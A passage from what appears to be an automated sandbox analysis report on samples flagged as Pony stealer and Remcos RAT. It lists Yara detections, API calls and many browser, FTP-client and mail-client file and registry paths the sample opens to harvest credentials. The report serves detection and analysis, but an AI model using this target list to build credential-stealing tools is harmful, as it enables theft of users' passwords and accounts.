GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,Sleep,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,11_2_0040FC69
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0041051E OleInitialize,GetUserNameA,5_2_0041051E
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_004045FD

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Pony
                    Source: Yara matchFile source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_00406447
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_004065DB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: \key3.db11_2_004065DB
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\SiteDesigner\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\History.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbarJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\RhinoSoft.com\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\TurboFTPJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\BitKinex\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\BlazeFtp\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBITJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\LeapWare\LeapFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\AceBITJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\NetSarang\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FTPInfo\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FileZilla\filezilla.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\BitKinex\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\RhinoSoft.com\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Program Files (x86)\CuteFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\SharedSettings.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\GHISLER\wcx_ftp.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\BlazeFtp\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FlashFXP\4\Sites.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\INSoftware\NovaFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FTP Explorer\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FTPGetter\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Program Files (x86)\CuteFTP\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FTPInfo\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FTP Explorer\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\CuteFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTPJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\SmartFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\Frigate3\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\SetupJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FileZilla\sitemanager.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\TurboFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\Frigate3\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FTPRush\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FTPGetter\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FlashFXP\3\Quick.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\Estsoft\ALFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\ExpanDrive\drives.jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\ExpanDrive\drives.jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\CuteFTP\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\TurboFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\AceBIT\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\TurboFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FlashFXP\3\Sites.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbarJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\SharedSettings.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\AceBIT\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\AceBIT\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Windows\32BitFtp.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FlashFXP\4\Quick.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\NetSarang\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\3D-FTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FTP Explorer\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\NetSarang\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbarJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FTPRush\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\History.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FlashFXP\3\History.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: HKEY_LOCAL_MACHINE\Software\TurboFTPJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\FlashFXP\4\History.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Local\Frigate3\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Windows\wcx_ftp.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xmlJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword5_2_0040EBA3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword5_2_0040EBA3

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: file.exeString found in binary or memory: Remcos_Mutex_Inj
                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: Remcos_Mutex_Inj
